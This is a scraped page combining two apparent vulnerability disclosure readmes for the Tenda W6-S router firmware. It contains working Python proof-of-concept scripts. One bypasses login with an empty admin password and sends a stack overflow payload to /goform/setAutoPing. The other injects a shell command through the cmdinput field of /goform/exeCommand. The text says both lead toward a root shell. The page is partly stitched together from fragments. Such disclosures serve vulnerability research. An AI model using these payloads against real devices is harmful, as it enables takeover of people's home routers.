requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

You can see that the router crashed, and finally you can write an exp to get a root shell

CVE-2022-45505: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda W6-S v1.0.0.4(510) was discovered to contain a stack overflow via the linkEn parameter at /goform/setAutoPing.

Permalink

**Tenda W6-S V1.0.0.4(510) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/setAutoPing, when linkEn is 1, ping1 and ping2 will be spliced into v9 by sprintf. It is worth noting that there is no size check which leads to a stack overflow vulnerability.

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/setAutoPing'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'linkEn=1&ping1=' + 'a' \* 0x3000
requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

After sending the poc, the router will crash, and finally we can write the exp to get the root shell

CVE-2022-45503: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda W6-S v1.0.0.4(510) was discovered to contain a command injection vulnerability in the tpi_get_ping_output function at /goform/exeCommand.

**Tenda W6-S V1.0.0.4(510) command injection vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/exeCommand, cmdinput is controlled by the user, it will be copied to s by vos\_strcpy, and finally tpi\_get\_ping\_output will be called to execute the command, which is not restricted, resulting in a command injection vulnerability

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/exeCommand'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'cmdinput=asd;ls -la . > ./tmp/test;aa'

requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

You can see that the command was executed successfully, and finally you can write exp to get the root shell

Tag

#webkit